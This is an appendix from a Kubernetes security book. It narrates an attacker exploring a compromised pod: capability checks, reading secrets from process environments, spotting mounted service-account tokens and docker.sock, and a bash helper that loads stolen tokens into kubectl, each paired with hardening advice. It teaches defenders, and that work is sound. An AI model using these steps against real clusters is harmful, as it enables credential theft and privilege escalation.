Appendix A. A Pod-Level Attack

This appendix is a hands-on exploration of attacks on the pod level, as we discussed in Chapter 2.

captain

Dread cyberpirate Captain Hashjack can now execute code inside a pod remotely and they will start to explore its configuration to see what else can be accessed.

Like all good pirates, Captain Hashjack has a treasure map, but this is no ordinary map with a clearly defined destination. Instead, this map describes only the journey, with no guarantee of reaching a conclusion. It’s a cluster attack map, as shown in Figure A-1, and it is used to guide us through the rest of the appendix. And now, from inside the pod, it’s time to explore.

Tip

Securing any system is difficult. The best way to find vulnerabilities and misconfiguration is to methodically observe your environment, build up a library of your own attacks and patterns, and not give up!

Pod Attack map
Figure A-1. Pod attack map

Filesystem

Upon entering a new environment, a little basic checking may lead to useful discoveries. The first thing Hashjack does is check to see what kind of container they’re in. Checking /proc/self/cgroup often gives a clue, and here they can see they’re in Kubernetes from the clue /kubepods/besteffort/pod8a6fa26b-...:

adversary@hashjack-5ddf66bb7b-9sssx:/$ cat /proc/self/cgroup
11:memory:/kubepods/besteffort/pod8a6fa26b-.../f3d7b09d9c3a1ab10cf88b3956...
10:cpu,cpuacct:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b...
9:blkio:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b3956704...
8:net_cls,net_prio:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10c...
7:perf_event:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39...
6:freezer:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39567...
5:pids:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39567048...
4:cpuset:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b395670...
3:hugetlb:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39567...
2:devices:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39567...
1:name=systemd:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b...

Next, they might check for capabilities with their process’s status entry in /proc/self/status:

Name:   cat
State:  R (running)
Tgid:   278
Ngid:   0
Pid:    278
PPid:   259
TracerPid:      0
Uid:    1001    1001    1001    1001
Gid:    0       0       0       0
FDSize: 256
Groups:
NStgid: 278
NSpid:  278
NSpgid: 278
NSsid:  259
VmPeak:     2432 kB
VmSize:     2432 kB
VmLck:         0 kB
VmPin:         0 kB
VmHWM:       752 kB
VmRSS:       752 kB
VmData:      312 kB
VmStk:       132 kB
VmExe:        28 kB
VmLib:      1424 kB
VmPTE:        24 kB
VmPMD:        12 kB
VmSwap:        0 kB
HugetlbPages:          0 kB
Threads:        1
SigQ:   0/15738
SigPnd: 0000000000000000
ShdPnd: 0000000000000000
SigBlk: 0000000000000000
SigIgn: 0000000000000000
SigCgt: 0000000000000000
CapInh: 00000000a80425fb
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
Seccomp:        0
Speculation_Store_Bypass:       vulnerable
Cpus_allowed:   0003
Cpus_allowed_list:      0-1
Mems_allowed:   00000000,00000001
Mems_allowed_list:      0
voluntary_ctxt_switches:        0
nonvoluntary_ctxt_switches:     1

The kernel freely provides this information in order to help Linux applications, and an attacker in a container can use it to their advantage. Interesting entries can be grepped out (notice we’re root below):

root@hack:~ [0]$ grep -E \
  '(Uid|CoreDumping|Seccomp|NoNewPrivs|Cap[A-Za-z]+):' /proc/self/status
Uid:    0       0       0       0
CoreDumping:    0
CapInh: 0000003fffffffff
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
NoNewPrivs:     0
Seccomp:        0

The capabilities are not very readable, and need to be decoded:

root@hack:~ [0]$ capsh --decode=0000003fffffffff
0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,
  cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,
  cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,
  cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,
  cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,
  cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,
  cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,
  cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read

You can also use the capsh --print command to show capabilities (if it’s installed), getpcaps and filecap (for a single process or file, respectively), pscap (for all running processes), and captest (for the current process’s context):

root@hack:~ [0]$ capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,
  cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,
  cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,
  cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,
  cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Ambient set =
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
 secure-no-ambient-raise: no (unlocked)
uid=0(root)
gid=0(root)
groups=1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)...

You may prefer to run Jess Frazelle’s amicontained, which runs these checks quickly and also handily detects capability, seccomp, and LSM configuration.

Let’s use amicontained:

root@hack:~ [0]$ export  AMICONTAINED_SHA256="d8c49e2cf44ee9668219acd092e\
d961fc1aa420a6e036e0822d7a31033776c9f" 1

root@hack:~ [0]$ curl -fSL \ 2
  "https://github.com/genuinetools/amicontained/releases/download/v0.4.9/\
amicontained-linux-amd64" \
  -o "/tmp/amicontained" \
  && echo "${AMICONTAINED_SHA256}  /tmp/amicontained" | sha256sum -c - \
  && chmod a+x "/tmp/amicontained"



root@hack:~ [0]$ /tmp/amicontained 3
Container Runtime: kube
Has Namespaces:
        pid: true
        user: false
AppArmor Profile: docker-default (enforce)
Capabilities:
        BOUNDING -> chown dac_override fowner fsetid kill setgid setuid
  setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap
Seccomp: disabled
Blocked system calls (26):
        SYSLOG SETUID SETSID SETREUID SETGROUPS SETRESUID VHANGUP
  PIVOT_ROOT ACCT SETTIMEOFDAY UMOUNT2 SWAPON SWAPOFF REBOOT SETHOSTNAME
  SETDOMAINNAME INIT_MODULE DELETE_MODULE LOOKUP_DCOOKIE KEXEC_LOAD
  FUTIMESAT UTIMENSAT FANOTIFY_INIT OPEN_BY_HANDLE_AT FINIT_MODULE
  KEXEC_FILE_LOAD
Looking for Docker.sock
1

Export the sha256sum for verification.

2

Download and check the sha256sum.

3

We installed to a non-standard path to evade immutable filesystems, so we run a fully-qualified path

Jackpot! There’s a lot of information available about the security configuration of a container—from within it.

We can check our cgroup limits on the filesystem too:

root@hack:~ [0]$ free -m
        total   used   free   shared   buff/cache   available
Mem:     3950    334   1473        6         2142        3327
Swap:       0      0      0

free -m uses host-level APIs available to all processes and has not been updated to run with cgroups. Check the system API to see the process’s actual cgroup limits:

root@host:~ [0]$ docker run -it --memory=4MB sublimino/hack \
  cat /sys/fs/cgroup/memory/memory.limit_in_bytes
4194304

Is this tremendously useful to an attacker? Not really. Exhausting the memory of a process and causing denial of service is a basic attack (although fork bombs are elegantly scripted Bash poetry). Nevertheless, you should set cgroups to prevent DoS of applications in a container or pod (which support individual configuration). Cgroups are not a security boundary, and cgroups v1 can be escaped from a privileged pod, as nicely demonstrated in Figure A-2.

haku aa02
Figure A-2. Felix Wilhelm’s cleverly tweet-sized cgroups v1 container breakout
Tip

The more secure, and rootless-prerequisite, cgroups v2 should be the default in most Linux installations from 2022.

Denial of service is more likely to be an application fault than an attack—serious DDoS (internet-based distributed denial of service) should be handled by networking equipment in front of the cluster for bandwidth and mitigation.

Note

In September of 2017 Google fought off a 2.54 Tbps DDoS. This type of traffic is dropped by network router hardware at Ingress to prevent overwhelming internal systems.

Kubernetes sets some useful environment variables into each container in a pod:

root@frontened:/frontend [0]$ env |
  grep -E '(KUBERNETES|[^_]SERVICE)_PORT=' | sort
ADSERVICE_PORT=tcp://10.3.253.186:9555
CARTSERVICE_PORT=tcp://10.3.251.123:7070
CHECKOUTSERVICE_PORT=tcp://10.3.240.26:5050
CURRENCYSERVICE_PORT=tcp://10.3.240.14:7000
EMAILSERVICE_PORT=tcp://10.3.242.14:5000
KUBERNETES_PORT=tcp://10.3.240.1:443
PAYMENTSERVICE_PORT=tcp://10.3.248.231:50051
PRODUCTCATALOGSERVICE_PORT=tcp://10.3.250.74:3550
RECOMMENDATIONSERVICE_PORT=tcp://10.3.254.65:8080
SHIPPINGSERVICE_PORT=tcp://10.3.242.42:50051

It is easy for an application to read its configuration from environment variables, and the 12 Factor App suggests that config and Secrets should be set in the environment. Environment variables are not a safe place to store Secrets as they can be read easily from the PID namespace by a process, user, or malicious code.

Tip

You can see a process’s environment as root, or the same user. Check PID 1 with a null-byte translation:

root@frontened:/frontend [0]$ tr '\0' '\n' < /proc/1/environ
HOSTNAME=9c7e824ed321
PWD=/
# ...

Even if no compromise takes place, many applications dump their environment when they crash, leaking Secrets to anyone who can access the logging system.

Kubernetes Secrets should not be mounted as environment variables.

Note

As well as being easy to collect from a parent process if an attacker has remote code execution, Kubernetes container environment variables are not updated after container creation: if the Secret is updated by the API server, the environment variable keeps the same value.

The safer option is to use a well-known path, and mount a Secret tmpfs volume into the container, so an adversary has to guess or find the Secret file path, which is less likely to be automated by an attacker. Mounted Secrets are updated automatically, after a kubelet sync period and cache propagation delay.

Here’s an example of a Secret mounted into the path /etc/foo:

apiVersion: v1
kind: Pod
metadata:
  name: mypod
spec:
  containers:
  - name: mypod
    image: redis
    volumeMounts:
    - name: foo
      mountPath: "/etc/foo"
      readOnly: true
  volumes:
  - name: foo
    secret:
      secretName: mysecret

Mounting Secrets as files protects against information leakage and ensures adversaries like Captain Hashjack don’t stumble across production secrets when diving through stolen application logs.

tmpfs

A fastidious explorer leaves no sea uncharted, and to Captain Hashjack attacking the filesystem is no different. Checking for anything external added to the mount namespace is the first port of call, for which common tools like mount and df can be used.

Let’s start with a search of the filesystem mount points for a common container filesystem driver, overlayfs. This may leak information about the type of container runtime that has configured the filesystem:

root@test-db-client-pod:~ [0]$ mount | grep overlay
overlay on / type overlay (rw,relatime,
  lowerdir=
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/316/fs:
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/315/fs:
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/314/fs:
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/313/fs:
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/312/fs:
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/311/fs:
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/310/fs:
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/309/fs:
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/308/fs,
  upperdir=
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/332/fs,
  workdir=
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/332/work)

We can see that the underlying container runtime is using a file path containing the name containerd, and the location of the container’s filesystem on the host disk is /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/316/fs. There are multiple layered directories listed, and these are combined into a single filesystem at runtime by overlayfs.

These paths are fingerprints of the container runtime’s default configuration, and runc leaks its identity in the same way, with a different filesystem layout:

root@dbe6633a6c94:/# mount | grep overlay
overlay on / type overlay (rw,relatime,lowerdir=
  /var/lib/docker/overlay2/l/3PTJCBKLNC2V5MRAEF3AU6EDMS:
  /var/lib/docker/overlay2/l/SAJGPHO7UFXGYFRMGNJPUOXSQ5:
  /var/lib/docker/overlay2/l/4CZQ74RFDNSDSHQB6CTY6CLW7H,
  upperdir=
  /var/lib/docker/overlay2/aed7645f42335835a83f25ae7ab00b98595532224...163/diff,
  workdir=
  /var/lib/docker/overlay2/aed7645f42335835a83f25ae7ab00b98595532224...163/work)

Run the df command to see if there are any Secrets mounted into the container. In this example no external entities are mounted into the container:

root@test-db-client-pod:~ [0]$ df
Filesystem     Type     Size  Used Avail Use% Mounted on
overlay        overlay   95G  6.6G   88G   7% /
tmpfs          tmpfs     64M     0   64M   0% /dev
tmpfs          tmpfs    7.1G     0  7.1G   0% /sys/fs/cgroup
/dev/sda1      ext4      95G  6.6G   88G   7% /etc/hosts
shm            tmpfs     64M     0   64M   0% /dev/shm
tmpfs          tmpfs    7.1G     0  7.1G   0% /proc/acpi
tmpfs          tmpfs    7.1G     0  7.1G   0% /proc/scsi
tmpfs          tmpfs    7.1G     0  7.1G   0% /sys/firmware

We can see that tmpfs is used for many different mounts, and some mounts are masking host filesystems in /proc and /sys. The container runtime performs additional masking on the special files in those directories.

Potentially interesting mounts in a vulnerable container filesytem may contain host mounted Secrets and sockets, especially the infamous Docker socket, and Kubernetes service accounts that may have RBAC authorization to escalate privilege, or enable further attacks:

root@test-db-client-pod:~ [0]$ df
Filesystem  Type   ...  Use% Mounted on
tmpfs       tmpfs  ...    1% /etc/secret-volume
tmpfs       tmpfs  ...    1% /run/docker.sock
tmpfs       tmpfs  ...    1% /run/secrets/kubernetes.io/serviceaccount

The easiest and most convenient of all container breakouts is the /var/run/docker.sock mount points: the container runtime’s socket from the host, that gives access to the Docker daemon running on the host. If those new containers are privileged, they can be used to trivially “escape” the container namespace and access the underlying host as root, as we saw previously in this chapter.

Other appealing targets include the Kubernetes service account tokens under /var/run/secrets/kubernetes.io/serviceaccount, or writable host mounted directories like /etc/secret-volume. Any of these could lead to a breakout, or assist a pivot.

Everything a kubelet mounts into its containers is visible to the root user on the kubelet’s host. We’ll see what the serviceAccount mounted at /run/secrets/kubernetes.io/serviceaccount looks like later, and we investigated what to do with stolen serviceAccount credentials in Chapter 8.

From within a pod kubectl uses the credentials in /run/secrets/kubernetes.io/serviceaccount by default. From the kubelet host these files are mounted under /var/lib/kubelet/pods/123e4567-e89b-12d3-a456-426614174000/volumes/kubernetes.io~secret/my-pod-token-7vzn2, so load the following command into a Bash shell:

kubectl-sa-dir () {
    local DIR="${1:-}";
    local API_SERVER="${2:-kubernetes.default}";
    kubectl config set-cluster tmpk8s --server="https://${API_SERVER}" \
      --certificate-authority="${DIR}/ca.crt";
    kubectl config set-context tmpk8s --cluster=tmpk8s;
    kubectl config set-credentials tmpk8s --token="$(<${DIR}/token)";
    kubectl config set-context tmpk8s --user=tmpk8s;
    kubectl config use-context tmpk8s;
    kubectl get secrets -n null 2>&1 | sed -E 's,.*r "([^"]+).*,\1,g'
}

And run it against a directory:

root@kube-node-1:~ [0]# kubectl-sa-dir \
  /var/lib/kubelet/pods/.../kubernetes.io~secret/priv-app-r4zkx/...229622223/
Cluster "tmpk8s" set.
Context "tmpk8s" created.
User "tmpk8s" set.
Context "tmpk8s" modified.
Switched to context "tmpk8s".
apiVersion: v1
clusters:
- cluster:
    certificate-authority: \
        /var/lib/kubelet/pods/.../kubernetes.io~secret/.../...229622223/ca.crt
    server: https://10.0.1.1:6443
  name: tmpk8s
# ...
system:serviceaccount:kube-system:priv-app

You’re now able to use the system:serviceaccount:kube-system:priv-app service account (SA) more easily with kubectl as it’s configured in your ~/.kube/config. An attacker can do the same thing—hostile root access to Kubernetes nodes reveals all its Secrets!

Tip

CSI storage interfaces and host filesystem mounts both pose a security risk if others have access to them. We explore external storage, the Container Storage Interface (CSI), and other mounts in greater detail in the Chapter 6.

What else is there mounted that might catch an adversary’s treasure-hungry gaze? Let’s explore further.

Host Mounts

The Kubernetes hostPath volume type mounts a filesystem path from the host into the container, which may be useful for some applications. /var/log is a popular mount point, so the host’s journal process collects container syslog events.

Warning

HostPath volumes should be avoided when possible as they present many risks. Best practice is to scope to only the needed file or directory using the ReadOnly mount flag.

Other use cases for hostPath mounts include persistence for datastores in the pod or hosting static data, libraries, and caches.

Using host disks or permanently attaching storage to a node creates a coupling between workloads and the underlying node, as the workloads must be restarted on that node in order to function properly. This makes scaling and resilience much more difficult.

Host mounts can be dangerous if a symlink is created inside the container that is unintentionally resolved on the host filesystem. This happened in CVE-2017–1002101, where a bug in the symbolic link–handling code allowed an adversary inside a container to explore the host mounted filesystem that the mount point was on.

Mounting of sockets from the host into the container is also a popular hostMount use case, which allows a client inside the container to run commands against a server on the host. This is an easy path to container breakout by starting a new privileged container on the host and escaping.

Mounting sensitive directories or files from the host may also provide an opportunity to pivot if they can be used for network services.

hostPath volumes are writeable on the host partition outside the container, and are always mounted on the host filesystem as owned by root:root. For this reason, a nonroot user should always be used inside the container, and filesystem permissions should always be configured on the host if write access is needed inside the container.

Warning

If you are restricting hostPath access to specific directories with admission controllers, those volumeMounts must be readOnly, otherwise new symlinks can be used to traverse the host filesystem.

Ultimately data is the lifeblood of your business, and managing state is hard. An attacker will be looking to gather, exfiltrate, and cryptolock any data they can find in your systems. Consuming an external service (such as an object store or database hosted outside your cluster) to persist data is often the most resilient and scalable way to secure a system—however, for high-bandwidth or low-latency applications this may be impossible.

For everything else, cloud provider or internal service integrations remove the link between a workload and the underlying host, which makes scaling, upgrades, and system deployments much easier.

Hostile Containers

A hostile container is one that is under an attacker’s control. It may be created by an attacker with Kubernetes access (perhaps the kubelet, or API server), or a container image with automated exploit code embedded (for example, a “trojanized” image from dockerscan that can start a reverse shell in a legitimate container to give attackers access to your production systems), or have been accessed by a remote adversary post-deployment.

What about the filesystem of a hostile container image? If Captain Hashjack can force Kubernetes to run a container they have built or corrupted, they may try to attack the orchestrator or container, runtimes, or clients (such as kubectl).

One attack (CVE-2019-16884) involves a container image that defines a VOLUME over a directory AppArmor uses for configuration, essentially disabling it at container runtime:

mkdir -p rootfs/proc/self/{attr,fd}
touch rootfs/proc/self/{status,attr/exec}
touch rootfs/proc/self/fd/{4,5}

This may be used as part of a further attack on the system, but as AppArmor is unlikely to be the only layer of defense, it is not as serious as it may appear.

Another dangerous container image is one used by a /proc/self/exe breakout in CVE-2019-5736. This exploit requires a container with a maliciously linked ENTRYPOINT, so can’t be run in a container that has already started.

As these attacks show, unless a container is built from trusted components, it should be considered untrusted to defend against further unknown attacks such as this.

Caution

A collection of kubectl cp CVEs (CVE-2018-1002100, CVE-2019-11249) require a malicious tar binary inside the container. The vulnerability stems from kubectl trusting the input it receives from the scp and tar process inside the container, which can be manipulated to overwrite files on the machine the kubectl binary is being run on.

Runtime

The danger of the /proc/self/exe breakout in CVE-2019-5736 is that a hostile container process can overwrite the runc binary on the host. That runc binary is owned by root, but as it is also executed by root on the host (as most container runtimes need some root capabilities), it can be overwritten from inside the container in this attack. This is because the container process is a child of runc, and this exploit uses the permission runc has to overwrite itself.

The root user has many special privileges as a result of years of kernel development that assumed only one “root” user. To limit the impact of RCE to the container, pod, and host, applications inside a container should not be run as root, and their capabilities should be dropped, without the ability to gain privileges by setting the allowPrivilegeEscalation securityContext field to false (which sets the no_new_privs flag on the container process).